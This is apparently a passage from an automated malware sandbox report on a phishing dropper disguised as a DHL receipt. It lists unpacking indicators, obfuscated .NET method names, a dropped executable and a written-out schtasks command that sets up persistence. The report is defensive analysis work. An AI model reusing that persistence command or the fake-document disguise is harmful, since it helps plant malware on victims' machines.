                Source: Binary string: EhStorAuthn.pdbGCTL source: RegSvcs.exe, 00000008.00000002.1997581227.0000000001267000.00000004.00000020.00020000.00000000.sdmp, CLaoxM16clnn.exe, 00000012.00000002.4207467975.000000000147E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb, source: EhStorAuthn.exe, 00000013.00000002.4207261427.000000000293A000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000004BFC000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000000.2067458925.0000000002B5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2297221481.000000003D25C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000008.00000002.1998214366.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208424946.000000000476E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000003.2002079290.000000000441C000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208424946.00000000045D0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000003.1996937638.0000000004266000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.1998214366.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208424946.000000000476E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000003.2002079290.000000000441C000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208424946.00000000045D0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000003.1996937638.0000000004266000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: EhStorAuthn.pdb source: RegSvcs.exe, 00000008.00000002.1997581227.0000000001267000.00000004.00000020.00020000.00000000.sdmp, CLaoxM16clnn.exe, 00000012.00000002.4207467975.000000000147E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: JifX.pdb source: DHL AWB Receipt_pdf.bat.exe, AYBPplggzXaXav.exe.0.dr
                Source: Binary string: JifX.pdbSHA256c source: DHL AWB Receipt_pdf.bat.exe, AYBPplggzXaXav.exe.0.dr
                Source: Binary string: RegSvcs.pdb source: EhStorAuthn.exe, 00000013.00000002.4207261427.000000000293A000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000013.00000002.4208812041.0000000004BFC000.00000004.10000000.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000000.2067458925.0000000002B5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2297221481.000000003D25C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CLaoxM16clnn.exe, 00000012.00000000.1922490796.000000000064F000.00000002.00000001.01000000.0000000D.sdmp, CLaoxM16clnn.exe, 00000015.00000000.2066595706.000000000064F000.00000002.00000001.01000000.0000000D.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, J3tOiUJLxpYfGfmwII.cs.Net Code: UM4qeegJM3 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, J3tOiUJLxpYfGfmwII.cs.Net Code: UM4qeegJM3 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.5650000.3.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 9.2.AYBPplggzXaXav.exe.2c7f220.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: 0x8104F5D4 [Thu Aug 5 01:52:20 2038 UTC]
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_060E0006 push es; ret 0_2_060E001C
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_0C0C1ACD push FFFFFF8Bh; iretd 0_2_0C0C1ACF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004071FF push C35DE58Bh; ret 8_2_00407237
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00403260 push eax; ret 8_2_00403262
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00408395 push ss; ret 8_2_00408397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004124E9 push eax; retf 8_2_004124EA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040B528 pushad ; retf 8_2_0040B52A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040D53D push esi; retf 8_2_0040D53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004146A6 push cs; iretd 8_2_004146BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F09AD push ecx; mov dword ptr [esp], ecx8_2_016F09B6
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeCode function: 9_2_0B8912ED push FFFFFF8Bh; iretd 9_2_0B8912EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0193C54F push 8B018C67h; ret 17_2_0193C554
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0193C54D pushfd ; ret 17_2_0193C54E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_018F09AD push ecx; mov dword ptr [esp], ecx17_2_018F09B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0193C9D7 push edi; ret 17_2_0193C9D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_018C1368 push eax; iretd 17_2_018C1369
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_018C1FEC push eax; iretd 17_2_018C1FED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01947E99 push ecx; ret 17_2_01947EAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_0042E0DA push ds; iretd 17_2_0042E0E1
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: section name: .text entropy: 7.8130274669385855
                Source: AYBPplggzXaXav.exe.0.drStatic PE information: section name: .text entropy: 7.8130274669385855
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, bDa2M0oK9vE6Gf1vBc.csHigh entropy of concatenated method names: 'j7pRhDudt6', 'yJxRplCO6Y', 'l7uRbZixUN', 'TZsRomYxO2', 'FmWRMu2jl5', 'Kq5RGf1mTe', 'fgPRmRyU7v', 'JRTRv6mG3X', 'A42RdPZboy', 'FOjRscFpo7'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, si9JgEcumAg30dqAH6.csHigh entropy of concatenated method names: 'MUcdCWVHOj', 'igUd4OH0sL', 'qq8dn10RF1', 'Fu6diSj9a0', 'bSmd7T0Kkm', 'csidjnptop', 'FtcdSuPx5r', 'SnNdFnbgKE', 'xNxdNGg9BS', 'BW5d9wTIQa'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, AFUpKa10wPAgLMUYOIX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vb5sQeZWnU', 'yvfsAL9N5s', 'af8sgDyOl1', 'viMsWOZKC5', 'WhBstJDZfe', 'qflsZIbtpf', 'j7LskjJSiB'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, mV4FSHZvZDOIMsB1uh.csHigh entropy of concatenated method names: 'ToString', 'PxSGQEVWYR', 'u4PG4PDCNQ', 'RtrGnNymwT', 'VsAGi3Tmfw', 'L8OG7byjvf', 'TNfGjMDcj4', 'b5FGSyDsZC', 'D6aGFUrQYE', 'k6OGN3nQVM'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, J3tOiUJLxpYfGfmwII.csHigh entropy of concatenated method names: 'AWyfl8jRBO', 'YaAfTKhhH7', 'SqvfYmapua', 'cbafRMZ8oJ', 'lyqfLaLYO1', 'BeUfPNbLlC', 'HIrfabF8v4', 'SnmfJg9BHk', 'dM2fE5ojtO', 'R9MfrW9iDg'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, tCMQJ6ia8jDxrqinL2.csHigh entropy of concatenated method names: 'lIEPIq1s8u', 'zriPxrLxvp', 'hS2PefI5AT', 'TDFPh1M8yJ', 'RmxPpZjvjj', 'zuWPUj8ukH', 'gxnPoMOY6R', 'GkyPXpVdb1', 'UZG7WvDE3C60L6BoNUG', 'VOBIMaD5XhkDFrG2BYw'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, kFAbJl2c17i4sud8dO.csHigh entropy of concatenated method names: 'oavdMWiunf', 'AE7dmM2YG6', 'PFmddDWCSS', 'Pl9d3qDhuU', 'e0kdwlU0qT', 'DmfdIj4MUQ', 'Dispose', 'DcsvTr9lG6', 'cuXvY4orHQ', 'njXvROIPrj'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, D68jwigE2t5mSN4rp0.csHigh entropy of concatenated method names: 'LLcub2kbqv', 'IHvuoUr36t', 'oTduC8n0jW', 'sfxu4Y0FD6', 'FuwuintRKI', 'dYou7ysLHh', 'EjbuSTA5sh', 'FIOuFh6VjN', 'Pxju9E3kX0', 'jBvuQcEZcR'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, bRfj2rC4pG7ZEhNLJ9.csHigh entropy of concatenated method names: 'j3IPlQ80i9', 'TB8PYi8NCp', 'QxvPLApyqU', 'o62PanQlOf', 'n47PJQtipL', 'c6fL8oYFL7', 'wBqL5KSLPt', 'rvTL252noD', 'eCQL6Hm1c5', 'EpyLcNeNhq'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, gl44wT1q87HLXYraSnC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ywdBdguOkj', 'PQ5Bs4IaZm', 'COMB34L44i', 'FsYBBHNEhl', 'sowBwlRVkK', 'R4DBy8lm6F', 'SnABI1vHWw'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, zdj3PEYig9NLqPPXiq.csHigh entropy of concatenated method names: 'Dispose', 'Ji41csud8d', 'nXqH4dreec', 'C6PoBUMBuk', 'A6d1VrH3I9', 'fOb1z8tZKi', 'ProcessDialogKey', 'b9sH0i9JgE', 'nmAH1g30dq', 'PH6HH3spSl'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, uspSlrVqFn8K2nCUsG.csHigh entropy of concatenated method names: 'LiEsRu8vSa', 'e2rsLeU0op', 'L2BsPEJ22o', 'vjgsaFWkFF', 'SHBsdnRknQ', 'KYBsJ0r04x', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, KcKrm2qW9xBIeWQLXF.csHigh entropy of concatenated method names: 'hGQ1aIIb5m', 'ms71JCURfU', 'aK91rvE6Gf', 'bvB1DcRMj6', 'zgU1Mt71Rf', 'K2r1G4pG7Z', 'e6BUsOLJkAU4AkRtkN', 'BrLeHQ3oyr4loovmrP', 'giQ1145QW4', 'o511f1xEeF'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, z8nNWL11sc77dM38xRF.csHigh entropy of concatenated method names: 'j95sVXFk5C', 'mLfsz8H9bF', 'VFf30KA3ts', 'QUs312UR04', 'gWB3H3RYUB', 'p393f3mvfO', 'rFi3qyqKul', 'Jbk3lguYrb', 'YpJ3TMIl8u', 'i5Y3YGc0nP'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, fc6Y4SNWFMIQhD6CIG.csHigh entropy of concatenated method names: 'gafaxsodbv', 'f9faKJGUn8', 'iDEaekhWpg', 'qgNahhkD5s', 'MADaOdv8v1', 'p4RapSGh8a', 'JnFaUGUBoW', 'nPqaby0oaJ', 'QE6aosIxGc', 'j8KaXbCjCr'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, hMj6LOXuKTkJRKgUt7.csHigh entropy of concatenated method names: 'ElELOCOKED', 'aT7LUW9Zp1', 'sVBRnUQ0Bd', 'FrKRif0aBc', 'iHOR7L8QZU', 'AQFRjHhUKo', 'fb7RSjd1s5', 'jkJRFIuSsa', 'z5kRNm7cDj', 'whnR9kPnR7'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, K1ZpIWW5G9VChrxXwO.csHigh entropy of concatenated method names: 'sd1M9ZycJJ', 'TLhMAtRwZf', 'Q7yMWV05cF', 'h8CMtMKCy9', 'E1kM4DSg2W', 'xDPMnuxVOU', 'iGjMisGjC9', 'WjrM7Pf6Jx', 'j8BMjYmMgs', 'GdnMSAmwVG'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, MFejuDHgOnDPHwdXdP.csHigh entropy of concatenated method names: 'p8IelUJMc', 'bjrhQBnVa', 'q9mpccdRa', 'I6VULHnU6', 'uddopnRqB', 'yLjX1uQ9Y', 'ygECXPuhBuV91S83g7', 'RQqCuT1EgYyIe0XE9M', 'BcfvIRGvk', 'UOhsOjLNY'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, pQrWXt5IqWQySIbpSx.csHigh entropy of concatenated method names: 'AHfm6l08YJ', 'kaAmVIgmcU', 'YVhv0mGEVe', 'dNgv1vBhFF', 'CevmQonXoa', 'wFWmAMATg9', 'VWqmglk3Ow', 'PuZmWRjH3C', 'T15mtEDtOV', 'KxsmZ11CO2'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, OIIb5mbrs7CURfU9gB.csHigh entropy of concatenated method names: 'FCYYWD8v5Z', 'tx1YtKeWvv', 'mbsYZJ37sB', 'uHUYkKEKXu', 'lBpY8j7XxJ', 'H66Y5A5aT7', 'DIYY2pM0Oi', 'JYMY6hIQue', 'KM2YcFikmD', 'P7mYVNTmCe'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, HwPeY9jqZdqHXJllxe.csHigh entropy of concatenated method names: 'u0IPZvc9b8', 'a1TPkac3an', 'HTZP8TFyQy', 'ToString', 'BnpP50Pd75', 'MHIP2Gkkx6', 'oXISovDfrdXiiTVG4S4', 'wcKthMDj7XOYgKce8mn', 'uyQRDODoKpMgVKfW9JZ'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.3fcf058.1.raw.unpack, nGvw7VzhFHODOIwNM1.csHigh entropy of concatenated method names: 'CddspwjxBw', 'Cnlsb63OPT', 'd05soQb1Wo', 'mGYsCkCXkv', 'qVxs4DNu9t', 'CoPsiI0ubO', 'dYbs7JIR4o', 'G7ksI0wccZ', 'nImsx6A06m', 'AGasKUYrZ5'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, bDa2M0oK9vE6Gf1vBc.csHigh entropy of concatenated method names: 'j7pRhDudt6', 'yJxRplCO6Y', 'l7uRbZixUN', 'TZsRomYxO2', 'FmWRMu2jl5', 'Kq5RGf1mTe', 'fgPRmRyU7v', 'JRTRv6mG3X', 'A42RdPZboy', 'FOjRscFpo7'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, si9JgEcumAg30dqAH6.csHigh entropy of concatenated method names: 'MUcdCWVHOj', 'igUd4OH0sL', 'qq8dn10RF1', 'Fu6diSj9a0', 'bSmd7T0Kkm', 'csidjnptop', 'FtcdSuPx5r', 'SnNdFnbgKE', 'xNxdNGg9BS', 'BW5d9wTIQa'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, AFUpKa10wPAgLMUYOIX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vb5sQeZWnU', 'yvfsAL9N5s', 'af8sgDyOl1', 'viMsWOZKC5', 'WhBstJDZfe', 'qflsZIbtpf', 'j7LskjJSiB'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, mV4FSHZvZDOIMsB1uh.csHigh entropy of concatenated method names: 'ToString', 'PxSGQEVWYR', 'u4PG4PDCNQ', 'RtrGnNymwT', 'VsAGi3Tmfw', 'L8OG7byjvf', 'TNfGjMDcj4', 'b5FGSyDsZC', 'D6aGFUrQYE', 'k6OGN3nQVM'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, J3tOiUJLxpYfGfmwII.csHigh entropy of concatenated method names: 'AWyfl8jRBO', 'YaAfTKhhH7', 'SqvfYmapua', 'cbafRMZ8oJ', 'lyqfLaLYO1', 'BeUfPNbLlC', 'HIrfabF8v4', 'SnmfJg9BHk', 'dM2fE5ojtO', 'R9MfrW9iDg'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, tCMQJ6ia8jDxrqinL2.csHigh entropy of concatenated method names: 'lIEPIq1s8u', 'zriPxrLxvp', 'hS2PefI5AT', 'TDFPh1M8yJ', 'RmxPpZjvjj', 'zuWPUj8ukH', 'gxnPoMOY6R', 'GkyPXpVdb1', 'UZG7WvDE3C60L6BoNUG', 'VOBIMaD5XhkDFrG2BYw'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, kFAbJl2c17i4sud8dO.csHigh entropy of concatenated method names: 'oavdMWiunf', 'AE7dmM2YG6', 'PFmddDWCSS', 'Pl9d3qDhuU', 'e0kdwlU0qT', 'DmfdIj4MUQ', 'Dispose', 'DcsvTr9lG6', 'cuXvY4orHQ', 'njXvROIPrj'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, D68jwigE2t5mSN4rp0.csHigh entropy of concatenated method names: 'LLcub2kbqv', 'IHvuoUr36t', 'oTduC8n0jW', 'sfxu4Y0FD6', 'FuwuintRKI', 'dYou7ysLHh', 'EjbuSTA5sh', 'FIOuFh6VjN', 'Pxju9E3kX0', 'jBvuQcEZcR'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, bRfj2rC4pG7ZEhNLJ9.csHigh entropy of concatenated method names: 'j3IPlQ80i9', 'TB8PYi8NCp', 'QxvPLApyqU', 'o62PanQlOf', 'n47PJQtipL', 'c6fL8oYFL7', 'wBqL5KSLPt', 'rvTL252noD', 'eCQL6Hm1c5', 'EpyLcNeNhq'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, gl44wT1q87HLXYraSnC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ywdBdguOkj', 'PQ5Bs4IaZm', 'COMB34L44i', 'FsYBBHNEhl', 'sowBwlRVkK', 'R4DBy8lm6F', 'SnABI1vHWw'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, zdj3PEYig9NLqPPXiq.csHigh entropy of concatenated method names: 'Dispose', 'Ji41csud8d', 'nXqH4dreec', 'C6PoBUMBuk', 'A6d1VrH3I9', 'fOb1z8tZKi', 'ProcessDialogKey', 'b9sH0i9JgE', 'nmAH1g30dq', 'PH6HH3spSl'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, uspSlrVqFn8K2nCUsG.csHigh entropy of concatenated method names: 'LiEsRu8vSa', 'e2rsLeU0op', 'L2BsPEJ22o', 'vjgsaFWkFF', 'SHBsdnRknQ', 'KYBsJ0r04x', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, KcKrm2qW9xBIeWQLXF.csHigh entropy of concatenated method names: 'hGQ1aIIb5m', 'ms71JCURfU', 'aK91rvE6Gf', 'bvB1DcRMj6', 'zgU1Mt71Rf', 'K2r1G4pG7Z', 'e6BUsOLJkAU4AkRtkN', 'BrLeHQ3oyr4loovmrP', 'giQ1145QW4', 'o511f1xEeF'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, z8nNWL11sc77dM38xRF.csHigh entropy of concatenated method names: 'j95sVXFk5C', 'mLfsz8H9bF', 'VFf30KA3ts', 'QUs312UR04', 'gWB3H3RYUB', 'p393f3mvfO', 'rFi3qyqKul', 'Jbk3lguYrb', 'YpJ3TMIl8u', 'i5Y3YGc0nP'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, fc6Y4SNWFMIQhD6CIG.csHigh entropy of concatenated method names: 'gafaxsodbv', 'f9faKJGUn8', 'iDEaekhWpg', 'qgNahhkD5s', 'MADaOdv8v1', 'p4RapSGh8a', 'JnFaUGUBoW', 'nPqaby0oaJ', 'QE6aosIxGc', 'j8KaXbCjCr'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, hMj6LOXuKTkJRKgUt7.csHigh entropy of concatenated method names: 'ElELOCOKED', 'aT7LUW9Zp1', 'sVBRnUQ0Bd', 'FrKRif0aBc', 'iHOR7L8QZU', 'AQFRjHhUKo', 'fb7RSjd1s5', 'jkJRFIuSsa', 'z5kRNm7cDj', 'whnR9kPnR7'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, K1ZpIWW5G9VChrxXwO.csHigh entropy of concatenated method names: 'sd1M9ZycJJ', 'TLhMAtRwZf', 'Q7yMWV05cF', 'h8CMtMKCy9', 'E1kM4DSg2W', 'xDPMnuxVOU', 'iGjMisGjC9', 'WjrM7Pf6Jx', 'j8BMjYmMgs', 'GdnMSAmwVG'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, MFejuDHgOnDPHwdXdP.csHigh entropy of concatenated method names: 'p8IelUJMc', 'bjrhQBnVa', 'q9mpccdRa', 'I6VULHnU6', 'uddopnRqB', 'yLjX1uQ9Y', 'ygECXPuhBuV91S83g7', 'RQqCuT1EgYyIe0XE9M', 'BcfvIRGvk', 'UOhsOjLNY'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, pQrWXt5IqWQySIbpSx.csHigh entropy of concatenated method names: 'AHfm6l08YJ', 'kaAmVIgmcU', 'YVhv0mGEVe', 'dNgv1vBhFF', 'CevmQonXoa', 'wFWmAMATg9', 'VWqmglk3Ow', 'PuZmWRjH3C', 'T15mtEDtOV', 'KxsmZ11CO2'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, OIIb5mbrs7CURfU9gB.csHigh entropy of concatenated method names: 'FCYYWD8v5Z', 'tx1YtKeWvv', 'mbsYZJ37sB', 'uHUYkKEKXu', 'lBpY8j7XxJ', 'H66Y5A5aT7', 'DIYY2pM0Oi', 'JYMY6hIQue', 'KM2YcFikmD', 'P7mYVNTmCe'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, HwPeY9jqZdqHXJllxe.csHigh entropy of concatenated method names: 'u0IPZvc9b8', 'a1TPkac3an', 'HTZP8TFyQy', 'ToString', 'BnpP50Pd75', 'MHIP2Gkkx6', 'oXISovDfrdXiiTVG4S4', 'wcKthMDj7XOYgKce8mn', 'uyQRDODoKpMgVKfW9JZ'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.7840000.4.raw.unpack, nGvw7VzhFHODOIwNM1.csHigh entropy of concatenated method names: 'CddspwjxBw', 'Cnlsb63OPT', 'd05soQb1Wo', 'mGYsCkCXkv', 'qVxs4DNu9t', 'CoPsiI0ubO', 'dYbs7JIR4o', 'G7ksI0wccZ', 'nImsx6A06m', 'AGasKUYrZ5'
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeFile created: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmp99C5.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
